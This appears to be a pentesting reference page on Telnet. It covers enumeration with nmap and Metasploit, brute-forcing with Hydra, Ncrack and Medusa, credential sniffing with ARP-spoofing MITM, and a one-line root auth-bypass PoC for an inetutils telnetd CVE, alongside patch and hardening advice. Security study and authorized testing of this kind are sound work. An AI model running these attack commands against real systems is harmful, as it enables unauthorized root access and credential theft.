23 - Telnet

💡 Study note: This document covers penetration-testing methods for Telnet and is intended as a reference for information-security beginners and practitioners.

⚠️ Legal notice: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.

23 - Telnet Service

Basic Information

Telnet is a network protocol that gives users an insecure way to access a computer over a network.

Default port: 23

23/tcp open  telnet

Information Gathering

nc -vn <IP> 23

All the interesting enumeration can be performed by nmap:

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

The script telnet-ntlm-info.nse will obtain NTLM info (Windows versions).

From the Telnet RFC: In the TELNET protocol there are various "options" that will be sanctioned and may be used with the "DO, DON'T, WILL, WON'T" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc.

I know it is possible to enumerate these options but I don't know how, so let me know if you know how.

Enumerate Telnet Options / Features

Telnet uses IAC + DO/DONT/WILL/WONT negotiations to enable options. You can observe supported options by capturing the initial negotiation and by probing for specific features.

Nmap option/feature probes

## Detect support for the Telnet ENCRYPT option
nmap -p 23 --script telnet-encryption <IP>

## Enumerate Microsoft Telnet NTLM info (NetBIOS/DNS/OS build)
nmap -p 23 --script telnet-ntlm-info <IP>

## Brute-force via NSE (alternative to Hydra/Medusa)
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>

The telnet-encryption script checks whether the ENCRYPT option is supported; some implementations historically handled this option incorrectly and were vulnerable, but the script only checks support. telnet-ntlm-info discloses NTLM metadata (NetBIOS/DNS/OS build) when Microsoft Telnet NTLM is enabled. telnet-brute is an NSE brute-force auditor for Telnet.

Brute force

Config file

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet

HackTricks Automatic Commands

Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number:  23     #Comma separated if there is more than one.
Protocol_Description: Telnet          #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for Telnet
  Note: |
    wireshark to hear creds being passed
    tcp.port == 23 and ip.addr != myip

    https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html

Entry_2:
  Name: Banner Grab
  Description: Grab Telnet Banner
  Command: nc -vn {IP} 23

Entry_3:
  Name: Nmap with scripts
  Description: Run nmap scripts for telnet
  Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
  Name: consoleless msf enumeration
  Description: Telnet enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

Recent Vulnerabilities (2022-2026)

  • CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860): Improper input validation in the telnet service allows remote attackers to log in using hard-coded credentials and inject OS commands; fixed by firmware 1.04B05 or later.
  • CVE-2023-40478 – NETGEAR RAX30: Stack-based buffer overflow in the Telnet CLI passwd command enables network-adjacent code execution as root; authentication is required but can be bypassed.
  • CVE-2022-39028 – GNU inetutils telnetd: A two-byte sequence (0xff 0xf7 / 0xff 0xf8) can trigger a NULL-pointer dereference in telnetd, and repeated crashes can lead inetd to disable the service (denial of service).

Keep these CVEs in mind during vulnerability triage: if the target is running unpatched firmware or a legacy inetutils Telnet daemon, you may have a straightforward path to code execution or a disruptive denial of service.

CVE-2026-24061 — GNU Inetutils telnetd auth bypass (Critical)

Primitive: Telnet NEW_ENVIRON lets clients push environment variables during option negotiation; inetutils telnetd substitutes %U in its login template with getenv("USER") and passes it directly to /usr/bin/login, enabling argv-level option injection (no shell expansion). Root cause: versions 1.9.3–2.7 expand %U without filtering, so a USER value beginning with - is parsed as a login flag. For example, %U becomes -f root, yielding /usr/bin/login -h <hostname> "-f root" and skipping authentication via login -f.

Exploitation flow:

  1. Connect to the Telnet service and negotiate NEW_ENVIRON to set USER=-f root.
  2. telnetd builds the login argv including the attacker-controlled %U value.
  3. /usr/bin/login interprets -f root as “pre-authenticated user root” and spawns a root shell.

PoC

## Inject USER via NEW_ENVIRON and obtain a root shell
USER='-f root' telnet -a <ip>

Patch note: inetutils 2.7-2 introduces a sanitize() helper that rejects values starting with - or containing whitespace/metacharacters before substituting them into the login argv, blocking option injection. Detection/verification: identify exposed daemons with telnetd --version, dpkg -l | grep inetutils, systemctl status inetutils-telnetd, or netstat -tlnp | grep :23.
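As an added example (not code from the original page or from inetutils), the following Python decodes the IAC DO/DONT/WILL/WONT negotiation described under "Enumerate Telnet Options / Features" and the NEW_ENVIRON subnegotiation this CVE abuses, then flags any environment value that the sanitize() rule described above (leading "-", whitespace or metacharacters) would reject. The UNSAFE pattern is an assumed approximation of that rule, and the sample capture is constructed.

```python
# Added example (not from the original page): decode Telnet option negotiation
# (RFC 854) and NEW-ENVIRON subnegotiation (RFC 1572) from captured bytes, then
# apply the rule the text attributes to the inetutils 2.7-2 sanitize() fix.
import re

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
NEW_ENVIRON, VAR, VALUE = 39, 0, 1              # option number; RFC 1572 VAR/VALUE
VERB = {DO: "DO", DONT: "DONT", WILL: "WILL", WONT: "WONT"}
# Assumed approximation of sanitize(): leading '-' or whitespace/metacharacters.
UNSAFE = re.compile(r"^-|[\s;&|$`<>()'\"\\]")

def parse_negotiation(stream: bytes):
    """Return ([(verb, option), ...], [sb_bytes, ...]) from raw Telnet bytes."""
    options, subnegs, i = [], [], 0
    while i + 1 < len(stream):
        if stream[i] != IAC:
            i += 1                                      # ordinary data byte
        elif stream[i + 1] in VERB and i + 2 < len(stream):
            options.append((VERB[stream[i + 1]], stream[i + 2]))
            i += 3
        elif stream[i + 1] == SB:
            end = stream.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                break                                   # truncated subnegotiation
            subnegs.append(stream[i + 2:end])           # option byte + payload
            i = end + 2
        else:
            i += 2                                      # IAC IAC, NOP, EC, EL, ...
    return options, subnegs

def parse_new_environ(payload: bytes):
    """Decode a NEW-ENVIRON IS/INFO payload into {name: value}; ESC (2) not handled."""
    pairs = [e.partition(bytes([VALUE]))                 # split on VAR (0) / USERVAR (3)
             for e in re.split(rb"[\x00\x03]", payload[1:]) if e]
    return {n.decode(errors="replace"): v.decode(errors="replace") for n, _, v in pairs}

def audit(stream: bytes):
    """Return negotiated options and the NEW-ENVIRON values sanitize() would reject."""
    options, subnegs = parse_negotiation(stream)
    env = {k: v for sb in subnegs if sb and sb[0] == NEW_ENVIRON
           for k, v in parse_new_environ(sb[1:]).items()}
    return options, [(k, v) for k, v in env.items() if UNSAFE.search(v)]

# Constructed client capture: WILL NEW-ENVIRON, IS reply with USER="-f root"
# and TERM="xterm", then DO ECHO (option 1).
SAMPLE = (bytes([IAC, WILL, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, 0, VAR]) + b"USER"
          + bytes([VALUE]) + b"-f root" + bytes([VAR]) + b"TERM" + bytes([VALUE])
          + b"xterm" + bytes([IAC, SE, IAC, DO, 1]))

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Feeding the same function the client side of a pcap-extracted Telnet stream gives a quick way to confirm whether a NEW_ENVIRON USER value of the form shown in the PoC reached an unpatched telnetd.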

Mitigations

  • Patch/upgrade affected packages immediately (e.g., Debian fixes are in 2:2.4-2+deb12u2, 2:2.6-3+deb13u1, and 2:2.7-2).
  • Disable Telnet or restrict access to trusted management networks while patching.

Sniffing Credentials & Man-in-the-Middle

Telnet transmits everything, including credentials, in clear-text. Two quick ways to capture them:

## Live capture with tcpdump (print ASCII); double quotes so the $(...) host lookup expands
sudo tcpdump -i eth0 -A "tcp port 23 and not src host $(hostname -I | cut -d' ' -f1)"

## Wireshark display filter
tcp.port == 23 && (telnet.data || telnet.option)

For active man-in-the-middle attacks, combine ARP spoofing (e.g. arpspoof/ettercap) with the same sniffing filters to harvest passwords on switched networks.

Automated Brute-force / Password Spraying

## Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>

## Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>

## Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f

Most IoT botnets (Mirai variants) still scan port 23 with small default-credential dictionaries—mirroring that logic can quickly identify weak devices.

Exploitation & Post-Exploitation

Metasploit has several useful modules:

  • auxiliary/scanner/telnet/telnet_version – banner & option enumeration.
  • auxiliary/scanner/telnet/brute_telnet – multithreaded bruteforce.
  • auxiliary/scanner/telnet/telnet_encrypt_overflow – remote code execution against vulnerable Solaris 9/10 Telnet (option ENCRYPT handling).
  • exploit/linux/mips/netgear_telnetenable – enables telnet service with a crafted packet on many NETGEAR routers.

After a shell is obtained remember that TTYs are usually dumb; upgrade with python -c 'import pty;pty.spawn("/bin/bash")' or use the HackTricks TTY tricks.

Hardening & Detection (Blue team corner)

  1. Prefer SSH and disable Telnet service completely.
  2. If Telnet is required, bind it to management VLANs only, enforce ACLs and wrap the daemon with TCP wrappers (/etc/hosts.allow).
  3. Replace legacy telnetd implementations with ssl-telnet or telnetd-ssl to add transport encryption, but this only protects data-in-transit—password-guessing remains trivial.
  4. Monitor for outbound traffic to port 23; compromises often spawn reverse shells over Telnet to bypass strict-HTTP egress filters.

Search Engine Syntax

FOFA

# FOFA search syntax
port="23"

Shodan

# Shodan search syntax
port:23

ZoomEye

# ZoomEye search syntax
port:23

📖 References